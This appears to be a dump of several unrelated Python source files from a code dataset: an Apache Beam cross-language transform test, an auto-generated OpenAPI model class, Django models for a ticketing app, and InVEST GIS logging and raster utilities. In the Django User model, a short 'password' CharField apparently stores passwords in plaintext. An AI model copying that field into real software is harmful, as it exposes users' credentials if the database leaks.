(https://beam.apache.org/documentation/programming-guide/#cogroupbykey)\n - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n - Flatten\n (https://beam.apache.org/documentation/programming-guide/#flatten)\n - Partition\n (https://beam.apache.org/documentation/programming-guide/#partition)\n\n See Runner Validation Test Plan for Cross-language transforms at\nhttps://docs.google.com/document/d/1xQp0ElIV84b8OCVz8CD2hvbiWdR8w4BvWxPTZJZA6NA\n for further details.\n\"\"\"\n\nimport logging\nimport os\nimport typing\nimport unittest\n\nfrom nose.plugins.attrib import attr\n\nimport apache_beam as beam\nfrom apache_beam.testing.test_pipeline import TestPipeline\nfrom apache_beam.testing.util import assert_that\nfrom apache_beam.testing.util import equal_to\nfrom apache_beam.transforms.external import ImplicitSchemaPayloadBuilder\n\nTEST_PREFIX_URN = \"beam:transforms:xlang:test:prefix\"\nTEST_MULTI_URN = \"beam:transforms:xlang:test:multi\"\nTEST_GBK_URN = \"beam:transforms:xlang:test:gbk\"\nTEST_CGBK_URN = \"beam:transforms:xlang:test:cgbk\"\nTEST_COMGL_URN = \"beam:transforms:xlang:test:comgl\"\nTEST_COMPK_URN = \"beam:transforms:xlang:test:compk\"\nTEST_FLATTEN_URN = \"beam:transforms:xlang:test:flatten\"\nTEST_PARTITION_URN = \"beam:transforms:xlang:test:partition\"\n\n\nclass CrossLanguageTestPipelines(object):\n def __init__(self, expansion_service=None):\n self.expansion_service = expansion_service or (\n 'localhost:%s' % os.environ.get('EXPANSION_PORT'))\n\n def run_prefix(self, pipeline):\n \"\"\"\n Target transform - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n Test scenario - Mapping elements from a single input collection to a\n single output collection\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create(['a', 'b']).with_output_types(str)\n | beam.ExternalTransform(\n TEST_PREFIX_URN,\n ImplicitSchemaPayloadBuilder({'data': u'0'}),\n self.expansion_service))\n assert_that(res, equal_to(['0a', '0b']))\n\n def run_multi_input_output_with_sideinput(self, pipeline):\n \"\"\"\n Target transform - ParDo\n (https://beam.apache.org/documentation/programming-guide/#pardo)\n Test scenario - Mapping elements from multiple input collections (main\n and side) to multiple output collections (main and side)\n Boundary conditions checked -\n - PCollectionTuple to external transforms\n - PCollectionTuple from external transforms\n \"\"\"\n with pipeline as p:\n main1 = p | 'Main1' >> beam.Create(\n ['a', 'bb'], reshuffle=False).with_output_types(str)\n main2 = p | 'Main2' >> beam.Create(\n ['x', 'yy', 'zzz'], reshuffle=False).with_output_types(str)\n side = p | 'Side' >> beam.Create(['s']).with_output_types(str)\n res = dict(\n main1=main1, main2=main2, side=side) | beam.ExternalTransform(\n TEST_MULTI_URN, None, self.expansion_service)\n assert_that(res['main'], equal_to(['as', 'bbs', 'xs', 'yys', 'zzzs']))\n assert_that(res['side'], equal_to(['ss']), label='CheckSide')\n\n def run_group_by_key(self, pipeline):\n \"\"\"\n Target transform - GroupByKey\n (https://beam.apache.org/documentation/programming-guide/#groupbykey)\n Test scenario - Grouping a collection of KV to a collection of\n KV> by key\n Boundary conditions checked -\n - PCollection> to external transforms\n - PCollection>> from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([(0, \"1\"), (0, \"2\"),\n (1, \"3\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n | beam.ExternalTransform(TEST_GBK_URN, None, self.expansion_service)\n | beam.Map(lambda x: \"{}:{}\".format(x[0], ','.join(sorted(x[1])))))\n assert_that(res, equal_to(['0:1,2', '1:3']))\n\n def run_cogroup_by_key(self, pipeline):\n \"\"\"\n Target transform - CoGroupByKey\n (https://beam.apache.org/documentation/programming-guide/#cogroupbykey)\n Test scenario - Grouping multiple input collections with keys to a\n collection of KV by key\n Boundary conditions checked -\n - KeyedPCollectionTuple to external transforms\n - PCollection>> from external transforms\n \"\"\"\n with pipeline as p:\n col1 = p | 'create_col1' >> beam.Create(\n [(0, \"1\"), (0, \"2\"), (1, \"3\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n col2 = p | 'create_col2' >> beam.Create(\n [(0, \"4\"), (1, \"5\"), (1, \"6\")], reshuffle=False).with_output_types(\n typing.Tuple[int, str])\n res = (\n dict(col1=col1, col2=col2)\n | beam.ExternalTransform(TEST_CGBK_URN, None, self.expansion_service)\n | beam.Map(lambda x: \"{}:{}\".format(x[0], ','.join(sorted(x[1])))))\n assert_that(res, equal_to(['0:1,2,4', '1:3,5,6']))\n\n def run_combine_globally(self, pipeline):\n \"\"\"\n Target transform - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n Test scenario - Combining elements globally with a predefined simple\n CombineFn\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([1, 2, 3]).with_output_types(int)\n | beam.ExternalTransform(\n TEST_COMGL_URN, None, self.expansion_service))\n assert_that(res, equal_to([6]))\n\n def run_combine_per_key(self, pipeline):\n \"\"\"\n Target transform - Combine\n (https://beam.apache.org/documentation/programming-guide/#combine)\n Test scenario - Combining elements per key with a predefined simple\n merging function\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([('a', 1), ('a', 2),\n ('b', 3)]).with_output_types(typing.Tuple[str, int])\n | beam.ExternalTransform(\n TEST_COMPK_URN, None, self.expansion_service))\n assert_that(res, equal_to([('a', 3), ('b', 3)]))\n\n def run_flatten(self, pipeline):\n \"\"\"\n Target transform - Flatten\n (https://beam.apache.org/documentation/programming-guide/#flatten)\n Test scenario - Merging multiple collections into a single collection\n Boundary conditions checked -\n - PCollectionList to external transforms\n - PCollection from external transforms\n \"\"\"\n with pipeline as p:\n col1 = p | 'col1' >> beam.Create([1, 2, 3]).with_output_types(int)\n col2 = p | 'col2' >> beam.Create([4, 5, 6]).with_output_types(int)\n res = ((col1, col2)\n | beam.ExternalTransform(\n TEST_FLATTEN_URN, None, self.expansion_service))\n assert_that(res, equal_to([1, 2, 3, 4, 5, 6]))\n\n def run_partition(self, pipeline):\n \"\"\"\n Target transform - Partition\n (https://beam.apache.org/documentation/programming-guide/#partition)\n Test scenario - Splitting a single collection into multiple collections\n with a predefined simple PartitionFn\n Boundary conditions checked -\n - PCollection to external transforms\n - PCollectionList from external transforms\n \"\"\"\n with pipeline as p:\n res = (\n p\n | beam.Create([1, 2, 3, 4, 5, 6]).with_output_types(int)\n | beam.ExternalTransform(\n TEST_PARTITION_URN, None, self.expansion_service))\n assert_that(res['0'], equal_to([2, 4, 6]), label='check_even')\n assert_that(res['1'], equal_to([1, 3, 5]), label='check_odd')\n\n\n@attr('UsesCrossLanguageTransforms')\n@unittest.skipUnless(\n os.environ.get('EXPANSION_PORT'),\n \"EXPANSION_PORT environment var is not provided.\")\nclass ValidateRunnerXlangTest(unittest.TestCase):\n _multiprocess_can_split_ = True\n\n def create_pipeline(self):\n test_pipeline = TestPipeline()\n test_pipeline.not_use_test_runner_api = True\n return test_pipeline\n\n def test_prefix(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_prefix(\n test_pipeline or self.create_pipeline())\n\n def test_multi_input_output_with_sideinput(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_multi_input_output_with_sideinput(\n test_pipeline or self.create_pipeline())\n\n def test_group_by_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_group_by_key(\n test_pipeline or self.create_pipeline())\n\n def test_cogroup_by_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_cogroup_by_key(\n test_pipeline or self.create_pipeline())\n\n def test_combine_globally(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_combine_globally(\n test_pipeline or self.create_pipeline())\n\n def test_combine_per_key(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_combine_per_key(\n test_pipeline or self.create_pipeline())\n\n def test_flatten(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_flatten(\n test_pipeline or self.create_pipeline())\n\n def test_partition(self, test_pipeline=None):\n CrossLanguageTestPipelines().run_partition(\n test_pipeline or self.create_pipeline())\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n unittest.main()\n"} {"ext": "py", "sha": "1a2eee8b4ab428996b7aa50d407ec5841bed9992", "content": "# coding: utf-8\n\n\"\"\"\n EPIC API\n\n REST API for interacting with EPIC (https://epic.zenotech.com) services.
    Please note this API is in BETA and does not yet contain all EPIC functionality. # noqa: E501\n\n The version of the OpenAPI document: v2\n Contact: support@zenotech.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom epiccore.configuration import Configuration\n\n\nclass TeamDetails(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'id': 'int',\n 'name': 'str',\n 'number_of_members': 'int',\n 'user_role': 'str',\n 'members': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'number_of_members': 'number_of_members',\n 'user_role': 'user_role',\n 'members': 'members'\n }\n\n def __init__(self, id=None, name=None, number_of_members=None, user_role=None, members=None, local_vars_configuration=None): # noqa: E501\n \"\"\"TeamDetails - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._id = None\n self._name = None\n self._number_of_members = None\n self._user_role = None\n self._members = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if number_of_members is not None:\n self.number_of_members = number_of_members\n if user_role is not None:\n self.user_role = user_role\n if members is not None:\n self.members = members\n\n @property\n def id(self):\n \"\"\"Gets the id of this TeamDetails. # noqa: E501\n\n ID for this team # noqa: E501\n\n :return: The id of this TeamDetails. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this TeamDetails.\n\n ID for this team # noqa: E501\n\n :param id: The id of this TeamDetails. # noqa: E501\n :type id: int\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"Gets the name of this TeamDetails. # noqa: E501\n\n Name of this team # noqa: E501\n\n :return: The name of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this TeamDetails.\n\n Name of this team # noqa: E501\n\n :param name: The name of this TeamDetails. # noqa: E501\n :type name: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n name is not None and len(name) < 1):\n raise ValueError(\"Invalid value for `name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._name = name\n\n @property\n def number_of_members(self):\n \"\"\"Gets the number_of_members of this TeamDetails. # noqa: E501\n\n Number of members in this team # noqa: E501\n\n :return: The number_of_members of this TeamDetails. # noqa: E501\n :rtype: int\n \"\"\"\n return self._number_of_members\n\n @number_of_members.setter\n def number_of_members(self, number_of_members):\n \"\"\"Sets the number_of_members of this TeamDetails.\n\n Number of members in this team # noqa: E501\n\n :param number_of_members: The number_of_members of this TeamDetails. # noqa: E501\n :type number_of_members: int\n \"\"\"\n\n self._number_of_members = number_of_members\n\n @property\n def user_role(self):\n \"\"\"Gets the user_role of this TeamDetails. # noqa: E501\n\n Your role in this team # noqa: E501\n\n :return: The user_role of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._user_role\n\n @user_role.setter\n def user_role(self, user_role):\n \"\"\"Sets the user_role of this TeamDetails.\n\n Your role in this team # noqa: E501\n\n :param user_role: The user_role of this TeamDetails. # noqa: E501\n :type user_role: str\n \"\"\"\n\n self._user_role = user_role\n\n @property\n def members(self):\n \"\"\"Gets the members of this TeamDetails. # noqa: E501\n\n List of user ids and roles for members of this team # noqa: E501\n\n :return: The members of this TeamDetails. # noqa: E501\n :rtype: str\n \"\"\"\n return self._members\n\n @members.setter\n def members(self, members):\n \"\"\"Sets the members of this TeamDetails.\n\n List of user ids and roles for members of this team # noqa: E501\n\n :param members: The members of this TeamDetails. # noqa: E501\n :type members: str\n \"\"\"\n\n self._members = members\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TeamDetails):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, TeamDetails):\n return True\n\n return self.to_dict() != other.to_dict()\n"} {"ext": "py", "sha": "1a2ef19fe5cde47f873d292aee2cd6eb153fe33c", "content": "from django.db import models\r\nfrom datetime import datetime\r\n\r\nclass Activity(models.Model):\r\n activity_id = models.AutoField(primary_key = True)\r\n title = models.CharField(max_length = 30)\r\n image = models.ImageField(upload_to = 'images', default = 'default/test_image.jpg')\r\n status = models.CharField(max_length = 20, default = '正在抢票')\r\n remain = models.IntegerField(default = 100)\r\n publisher = models.CharField(max_length = 30, default = 'unknown publisher')\r\n description = models.CharField(max_length = 1024, default = '哎呀,这个活动的介绍文字似乎走丢了...')\r\n time = models.DateTimeField(default = datetime.now)\r\n place = models.CharField(max_length = 30, default = 'none place')\r\n price = models.FloatField(default = 0.0)\r\n\r\n heat = models.FloatField(default = 50.0) # 活动热度\r\n scan_change = models.FloatField(default = 0.02) # 浏览时增加的热度\r\n star_change = models.FloatField(default = 0.5) # 关注/取关时的热度变化\r\n purchase_change = models.FloatField(default = 2.0) # 购买/退票时的热度变化\r\n # arrive_change = models.FloatField(default = 2.5) # 到场时的热度变化\r\n # max_heat = models.FloatField(default = 1000)\r\n min_heat = models.FloatField(default = 0) # 活动过期后置为最低热度\r\n\r\n # 该活动有以下检票员\r\n # inspectors = models.ManyToManyField(User)\r\n \r\n class Meta:\r\n db_table = 'Activity'\r\n\r\nclass User(models.Model):\r\n # basic info\r\n user_id = models.AutoField(primary_key = True)\r\n openid = models.CharField(max_length = 30)\r\n username = models.CharField(max_length = 30)\r\n password = models.CharField(max_length = 30)\r\n student_id = models.CharField(max_length = 10, default=0, blank=True, null=True)\r\n # ManyToManyField中没有null,设置blank以实现可在admin中置空\r\n # 关联一个外键多次时,需使用related_name\r\n starred = models.ManyToManyField(Activity, related_name='starred', blank=True)\r\n # 该用户向以下活动提出了待处理的检票员申请\r\n inspector_apply_list = models.ManyToManyField(Activity, related_name='inspector_apply_list', blank=True)\r\n # 该用户是以下活动的检票员\r\n inspector_list = models.ManyToManyField(Activity, related_name='inspector_list', blank=True)\r\n\r\n # varify info\r\n is_verified = models.BooleanField(default=False) # 学号登录验证接口\r\n\r\n class Meta:\r\n db_table = 'User'\r\n\r\nclass Ticket(models.Model):\r\n ticket_id = models.AutoField(primary_key = True)\r\n owner = models.ForeignKey(User, on_delete=models.DO_NOTHING, default = '')\r\n activity = models.ForeignKey(Activity, on_delete=models.DO_NOTHING, default = '')\r\n is_valid = models.BooleanField(default=False) # 仅表示是否退票\r\n purchaseTime = models.DateTimeField('购票日期', auto_now_add = True) # PS:auto_now_add使之为readonly。若需修改puchaseTime,则此处应改用default = timezone.now\r\n # WARMNING:修改含auto_now或auto_now_add的字段时,需先改为default = 'xxxx-xx-xx xx:xx:xx'并完成一次迁移\r\n QRCode = models.ImageField(upload_to = 'QR', default = 'QR/default.png')\r\n is_checked = models.BooleanField(default=False)\r\n\r\n class Meta:\r\n db_table = 'Ticket'\r\n"} {"ext": "py", "sha": "1a2ef246f1d7ab7917028ee9191f2a5562970364", "content": "\"\"\"InVEST specific code utils.\"\"\"\nimport codecs\nimport math\nimport os\nimport contextlib\nimport logging\nimport tempfile\nimport shutil\nfrom datetime import datetime\nimport time\n\nimport pandas\nimport numpy\nfrom shapely.wkt import loads\nfrom osgeo import gdal\nfrom osgeo import osr\nimport pygeoprocessing\n\n\nLOGGER = logging.getLogger(__name__)\nLOG_FMT = (\n \"%(asctime)s \"\n \"(%(name)s) \"\n \"%(module)s.%(funcName)s(%(lineno)d) \"\n \"%(levelname)s %(message)s\")\n\n# GDAL has 5 error levels, python's logging has 6. We skip logging.INFO.\n# A dict clarifies the mapping between levels.\nGDAL_ERROR_LEVELS = {\n gdal.CE_None: logging.NOTSET,\n gdal.CE_Debug: logging.DEBUG,\n gdal.CE_Warning: logging.WARNING,\n gdal.CE_Failure: logging.ERROR,\n gdal.CE_Fatal: logging.CRITICAL,\n}\n\n# In GDAL 3.0 spatial references no longer ignore Geographic CRS Axis Order\n# and conform to Lat first, Lon Second. Transforms expect (lat, lon) order\n# as opposed to the GIS friendly (lon, lat). See\n# https://trac.osgeo.org/gdal/wiki/rfc73_proj6_wkt2_srsbarn Axis order\n# issues. SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER) swaps the\n# axis order, which will use Lon,Lat order for Geographic CRS, but otherwise\n# leaves Projected CRS alone\nDEFAULT_OSR_AXIS_MAPPING_STRATEGY = osr.OAMS_TRADITIONAL_GIS_ORDER\n\n\n@contextlib.contextmanager\ndef capture_gdal_logging():\n \"\"\"Context manager for logging GDAL errors with python logging.\n\n GDAL error messages are logged via python's logging system, at a severity\n that corresponds to a log level in ``logging``. Error messages are logged\n with the ``osgeo.gdal`` logger.\n\n Args:\n ``None``\n\n Returns:\n ``None``\n \"\"\"\n osgeo_logger = logging.getLogger('osgeo')\n\n def _log_gdal_errors(err_level, err_no, err_msg):\n \"\"\"Log error messages to osgeo.\n\n All error messages are logged with reasonable ``logging`` levels based\n on the GDAL error level.\n\n Args:\n err_level (int): The GDAL error level (e.g. ``gdal.CE_Failure``)\n err_no (int): The GDAL error number. For a full listing of error\n codes, see: http://www.gdal.org/cpl__error_8h.html\n err_msg (string): The error string.\n\n Returns:\n ``None``\n \"\"\"\n osgeo_logger.log(\n level=GDAL_ERROR_LEVELS[err_level],\n msg='[errno {err}] {msg}'.format(\n err=err_no, msg=err_msg.replace('\\n', ' ')))\n\n gdal.PushErrorHandler(_log_gdal_errors)\n try:\n yield\n finally:\n gdal.PopErrorHandler()\n\n\ndef _format_time(seconds):\n \"\"\"Render the integer number of seconds as a string. Returns a string.\"\"\"\n hours, remainder = divmod(seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n\n hours = int(hours)\n minutes = int(minutes)\n\n if hours > 0:\n return \"%sh %sm %ss\" % (hours, minutes, seconds)\n\n if minutes > 0:\n return \"%sm %ss\" % (minutes, seconds)\n return \"%ss\" % seconds\n\n\n@contextlib.contextmanager\ndef prepare_workspace(\n workspace, name, logging_level=logging.NOTSET, exclude_threads=None):\n \"\"\"Prepare the workspace.\"\"\"\n if not os.path.exists(workspace):\n os.makedirs(workspace)\n\n logfile = os.path.join(\n workspace,\n 'InVEST-{modelname}-log-{timestamp}.txt'.format(\n modelname='-'.join(name.replace(':', '').split(' ')),\n timestamp=datetime.now().strftime(\"%Y-%m-%d--%H_%M_%S\")))\n\n with capture_gdal_logging(), log_to_file(logfile,\n exclude_threads=exclude_threads,\n logging_level=logging_level):\n with sandbox_tempdir(dir=workspace):\n logging.captureWarnings(True)\n LOGGER.info('Writing log messages to %s', logfile)\n start_time = time.time()\n try:\n yield\n finally:\n LOGGER.info('Elapsed time: %s',\n _format_time(round(time.time() - start_time, 2)))\n logging.captureWarnings(False)\n\n\nclass ThreadFilter(logging.Filter):\n \"\"\"Filters out log messages issued by the given thread.\n\n Any log messages generated by a thread with the name matching the\n threadname provided to the constructor will be excluded.\n \"\"\"\n def __init__(self, thread_name):\n \"\"\"Construct a ThreadFilter.\n\n Args:\n thread_name (string): The thread name to filter on.\n\n \"\"\"\n logging.Filter.__init__(self)\n self.thread_name = thread_name\n\n def filter(self, record):\n \"\"\"Filter the given log record.\n\n Args:\n record (log record): The log record to filter.\n\n Returns:\n True if the record should be included, false if not.\n \"\"\"\n if record.threadName == self.thread_name:\n return False\n return True\n\n\n@contextlib.contextmanager\ndef log_to_file(logfile, exclude_threads=None, logging_level=logging.NOTSET,\n log_fmt=LOG_FMT, date_fmt=None):\n \"\"\"Log all messages within this context to a file.\n\n Args:\n logfile (string): The path to where the logfile will be written.\n If there is already a file at this location, it will be\n overwritten.\n exclude_threads=None (list): If None, logging from all threads will be\n included in the log. If a list, it must be a list of string thread\n names that should be excluded from logging in this file.\n logging_level=logging.NOTSET (int): The logging threshold. Log\n messages with a level less than this will be automatically\n excluded from the logfile. The default value (``logging.NOTSET``)\n will cause all logging to be captured.\n log_fmt=LOG_FMT (string): The logging format string to use. If not\n provided, ``utils.LOG_FMT`` will be used.\n date_fmt (string): The logging date format string to use.\n If not provided, ISO8601 format will be used.\n\n\n Yields:\n ``handler``: An instance of ``logging.FileHandler`` that\n represents the file that is being written to.\n\n Returns:\n ``None``\n \"\"\"\n try:\n if os.path.exists(logfile):\n LOGGER.warning('Logfile %s exists and will be overwritten',\n logfile)\n except SystemError:\n # This started happening in Windows tests:\n # SystemError: returned NULL without\n # setting an error\n # Looking at https://bugs.python.org/issue28040#msg276223, this might\n # be a low-level python error.\n pass\n\n handler = logging.FileHandler(logfile, 'w', encoding='UTF-8')\n formatter = logging.Formatter(log_fmt, date_fmt)\n root_logger = logging.getLogger()\n root_logger.setLevel(logging.NOTSET)\n root_logger.addHandler(handler)\n handler.setFormatter(formatter)\n handler.setLevel(logging_level)\n\n if exclude_threads is not None:\n for threadname in exclude_threads:\n thread_filter = ThreadFilter(threadname)\n handler.addFilter(thread_filter)\n\n try:\n yield handler\n finally:\n handler.close()\n root_logger.removeHandler(handler)\n\n\n@contextlib.contextmanager\ndef sandbox_tempdir(suffix='', prefix='tmp', dir=None):\n \"\"\"Create a temporary directory for this context and clean it up on exit.\n\n Parameters are identical to those for :py:func:`tempfile.mkdtemp`.\n\n When the context manager exits, the created temporary directory is\n recursively removed.\n\n Args:\n suffix='' (string): a suffix for the name of the directory.\n prefix='tmp' (string): the prefix to use for the directory name.\n dir=None (string or None): If a string, a directory that should be\n the parent directory of the new temporary directory. If None,\n tempfile will determine the appropriate tempdir to use as the\n parent folder.\n\n Yields:\n ``sandbox`` (string): The path to the new folder on disk.\n\n Returns:\n ``None``\n \"\"\"\n sandbox = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)\n\n try:\n yield sandbox\n finally:\n try:\n shutil.rmtree(sandbox)\n except OSError:\n LOGGER.exception('Could not remove sandbox %s', sandbox)\n\n\ndef make_suffix_string(args, suffix_key):\n \"\"\"Make an InVEST appropriate suffix string.\n\n Creates an InVEST appropriate suffix string given the args dictionary and\n suffix key. In general, prepends an '_' when necessary and generates an\n empty string when necessary.\n\n Args:\n args (dict): the classic InVEST model parameter dictionary that is\n passed to `execute`.\n suffix_key (string): the key used to index the base suffix.\n\n Returns:\n If `suffix_key` is not in `args`, or `args['suffix_key']` is \"\"\n return \"\",\n If `args['suffix_key']` starts with '_' return `args['suffix_key']`\n else return '_'+`args['suffix_key']`\n \"\"\"\n try:\n file_suffix = args[suffix_key]\n if file_suffix != \"\" and not file_suffix.startswith('_'):\n file_suffix = '_' + file_suffix\n except KeyError:\n file_suffix = ''\n\n return file_suffix\n\n\ndef exponential_decay_kernel_raster(expected_distance, kernel_filepath):\n \"\"\"Create a raster-based exponential decay kernel.\n\n The raster created will be a tiled GeoTiff, with 256x256 memory blocks.\n\n Args:\n expected_distance (int or float): The distance (in pixels) of the\n kernel's radius, the distance at which the value of the decay\n function is equal to `1/e`.\n kernel_filepath (string): The path to the file on disk where this\n kernel should be stored. If this file exists, it will be\n overwritten.\n\n Returns:\n None\n \"\"\"\n max_distance = expected_distance * 5\n kernel_size = int(numpy.round(max_distance * 2 + 1))\n\n driver = gdal.GetDriverByName('GTiff')\n kernel_dataset = driver.Create(\n kernel_filepath.encode('utf-8'), kernel_size, kernel_size, 1,\n gdal.GDT_Float32, options=[\n 'BIGTIFF=IF_SAFER', 'TILED=YES', 'BLOCKXSIZE=256',\n 'BLOCKYSIZE=256'])\n\n # Make some kind of geotransform, it doesn't matter what but\n # will make GIS libraries behave better if it's all defined\n kernel_dataset.SetGeoTransform([0, 1, 0, 0, 0, -1])\n srs = osr.SpatialReference()\n srs.SetWellKnownGeogCS('WGS84')\n kernel_dataset.SetProjection(srs.ExportToWkt())\n\n kernel_band = kernel_dataset.GetRasterBand(1)\n kernel_band.SetNoDataValue(-9999)\n\n cols_per_block, rows_per_block = kernel_band.GetBlockSize()\n\n n_cols = kernel_dataset.RasterXSize\n n_rows = kernel_dataset.RasterYSize\n\n n_col_blocks = int(math.ceil(n_cols / float(cols_per_block)))\n n_row_blocks = int(math.ceil(n_rows / float(rows_per_block)))\n\n integration = 0.0\n for row_block_index in range(n_row_blocks):\n row_offset = row_block_index * rows_per_block\n row_block_width = n_rows - row_offset\n if row_block_width > rows_per_block:\n row_block_width = rows_per_block\n\n for col_block_index in range(n_col_blocks):\n col_offset = col_block_index * cols_per_block\n col_block_width = n_cols - col_offset\n if col_block_width > cols_per_block:\n col_block_width = cols_per_block\n\n # Numpy creates index rasters as ints by default, which sometimes\n # creates problems on 32-bit builds when we try to add Int32\n # matrices to float64 matrices.\n row_indices, col_indices = numpy.indices((row_block_width,\n col_block_width),\n dtype=float)\n\n row_indices += float(row_offset - max_distance)\n col_indices += float(col_offset - max_distance)\n\n kernel_index_distances = numpy.hypot(\n row_indices, col_indices)\n kernel = numpy.where(\n kernel_index_distances > max_distance, 0.0,\n numpy.exp(-kernel_index_distances / expected_distance))\n integration += numpy.sum(kernel)\n\n kernel_band.WriteArray(kernel, xoff=col_offset,\n yoff=row_offset)\n\n # Need to flush the kernel's cache to disk before opening up a new Dataset\n # object in interblocks()\n kernel_band.FlushCache()\n kernel_dataset.FlushCache()\n\n for block_data in pygeoprocessing.iterblocks(\n (kernel_filepath, 1), offset_only=True):\n kernel_block = kernel_band.ReadAsArray(**block_data)\n kernel_block /= integration\n kernel_band.WriteArray(kernel_block, xoff=block_data['xoff'],\n yoff=block_data['yoff'])\n\n kernel_band.FlushCache()\n kernel_dataset.FlushCache()\n kernel_band = None\n kernel_dataset = None\n\n\ndef build_file_registry(base_file_path_list, file_suffix):\n \"\"\"Combine file suffixes with key names, base filenames, and directories.\n\n Args:\n base_file_tuple_list (list): a list of (dict, path) tuples where\n the dictionaries have a 'file_key': 'basefilename' pair, or\n 'file_key': list of 'basefilename's. 'path'\n indicates the file directory path to prepend to the basefile name.\n file_suffix (string): a string to append to every filename, can be\n empty string\n\n Returns:\n dictionary of 'file_keys' from the dictionaries in\n `base_file_tuple_list` mapping to full file paths with suffixes or\n lists of file paths with suffixes depending on the original type of\n the 'basefilename' pair.\n\n Raises:\n ValueError if there are duplicate file keys or duplicate file paths.\n ValueError if a path is not a string or a list of strings.\n \"\"\"\n all_paths = set()\n duplicate_keys = set()\n duplicate_paths = set()\n f_reg = {}\n\n def _build_path(base_filename, path):\n \"\"\"Internal helper to avoid code duplication.\"\"\"\n pre, post = os.path.splitext(base_filename)\n full_path = os.path.join(path, pre+file_suffix+post)\n\n # Check for duplicate keys or paths\n if full_path in all_paths:\n duplicate_paths.add(full_path)\n else:\n all_paths.add(full_path)\n return full_path\n\n for base_file_dict, path in base_file_path_list:\n for file_key, file_payload in base_file_dict.items():\n # check for duplicate keys\n if file_key in f_reg:\n duplicate_keys.add(file_key)\n else:\n # handle the case whether it's a filename or a list of strings\n if isinstance(file_payload, str):\n full_path = _build_path(file_payload, path)\n f_reg[file_key] = full_path\n elif isinstance(file_payload, list):\n f_reg[file_key] = []\n for filename in file_payload:\n full_path = _build_path(filename, path)\n f_reg[file_key].append(full_path)\n else:\n raise ValueError(\n \"Unknown type in base_file_dict[%s]=%s\" % (\n file_key, path))\n\n if len(duplicate_paths) > 0 or len(duplicate_keys):\n raise ValueError(\n \"Cannot consolidate because of duplicate paths or keys: \"\n \"duplicate_keys: %s duplicate_paths: %s\" % (\n duplicate_keys, duplicate_paths))\n\n return f_reg\n\n\ndef build_lookup_from_csv(\n table_path, key_field, column_list=None, to_lower=True):\n \"\"\"Read a CSV table into a dictionary indexed by ``key_field``.\n\n Creates a dictionary from a CSV whose keys are unique entries in the CSV\n table under the column named by ``key_field`` and values are dictionaries\n indexed by the other columns in ``table_path`` including ``key_field``\n whose values are the values on that row of the CSV table.\n\n If an entire row is NA/NaN (including ``key_field``) then it is dropped\n from the table and a warning is given of the dropped rows.\n\n Args:\n table_path (string): path to a CSV file containing at\n least the header key_field\n key_field: (string): a column in the CSV file at `table_path` that\n can uniquely identify each row in the table and sets the row index.\n column_list (list): a list of column names to subset from the CSV\n file, default=None\n to_lower (bool): if True, converts all unicode in the CSV,\n including headers and values to lowercase, otherwise uses raw\n string values. default=True.\n\n Returns:\n lookup_dict (dict): a dictionary of the form \n {key_field_0: {csv_header_0: value0, csv_header_1: value1...},\n key_field_1: 